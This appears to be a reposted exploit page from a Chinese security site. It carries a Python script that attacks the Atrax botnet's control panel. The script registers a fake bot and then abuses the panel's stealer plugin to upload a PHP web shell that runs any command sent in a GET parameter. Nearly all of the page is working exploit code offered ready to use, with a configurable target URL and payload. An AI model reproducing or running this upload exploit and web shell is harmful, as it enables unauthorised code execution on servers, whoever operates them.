Atrax Botnet Shell Upload Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Atrax Botnet Shell Upload Vulnerability

来源：1337day.com 作者：Xylitol 发布时间：2014-11-25

import random

import string

import base64

import urllib

import urllib2

# <CONFIG>

payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'

url = 'http://localhost/atrax/'

# </CONFIG>

BOT_MODE_INSERT = 'b' # BOT MODE

BOT_MODE_RUNPLUGIN = 'e'

GET_PARAM_MODE = 'a' # GET PARAM

POST_PARAM_GUID = 'h' # POST PARAM

POST_PARAM_IP = 'i'

POST_PARAM_BUILDID = 'j'

POST_PARAM_PC = 'k'

POST_PARAM_OS = 'l'

POST_PARAM_ADMIN = 'm'

POST_PARAM_CPU = 'n'

POST_PARAM_GPU = 'o'

POST_PARAM_PLUGINNAME = 'q'

def request(url, get, post):

if not get == '':

url += '?' + get

encoded = {}

if not post == '':

for _ in post.split('&'):

data = _.split('=')

encoded[data[0]] = data[1]

encoded = urllib.urlencode(encoded)

request = urllib2.Request(url, encoded)

response = urllib2.urlopen(request)

page = response.read()

return page

def queryValue(key, value, next=True):

ret = key + '=' + value

if next:

ret += '&'

return ret

def randomString(length = 8):

return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))

def createVictim(url, guid, ip):

get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)

post = queryValue(POST_PARAM_GUID, guid)

post += queryValue(POST_PARAM_IP, ip)

post += queryValue(POST_PARAM_BUILDID, randomString())

post += queryValue(POST_PARAM_PC, randomString())

post += queryValue(POST_PARAM_OS, randomString())

post += queryValue(POST_PARAM_ADMIN, 'yes')

post += queryValue(POST_PARAM_CPU, randomString())

post += queryValue(POST_PARAM_GPU, randomString(), False)

return request(url + 'auth.php', get, post)

def exploit(url, guid, ip, file, payload):

get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)

post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')

post += queryValue(POST_PARAM_GUID, guid)

post += queryValue(POST_PARAM_IP, ip)

post += queryValue('am', randomString())

post += queryValue('ad', file)

post += queryValue('ab', base64.b64encode(payload))

post += queryValue('ai', '18', False)

request(url + 'auth.php', get, post)

def testExploit(url, guid, ip):

file = randomString() + '.php'

payload = '<?php echo("1337"); ?>'

exploit(url, guid, ip, file, payload)

return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'

guid = '7461707a7461707a7461707a7461707a'

ip = '91.224.13.103'

file = randomString() + '.php'

if createVictim(url, guid, ip).strip() == 'STOP':

print '[-] Cannot create victim...'

else:

print '[~] Victim created/updated...'

if testExploit(url, guid, ip):

exploit(url, guid, ip, file, payload)

print '[+] Exploit uploaded!'

print '=> ' + url + 'plugins/atraxstealer/wallet/' + file

else:

print '[-] Cannot upload payload, maybe the plugin is not actived?'

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告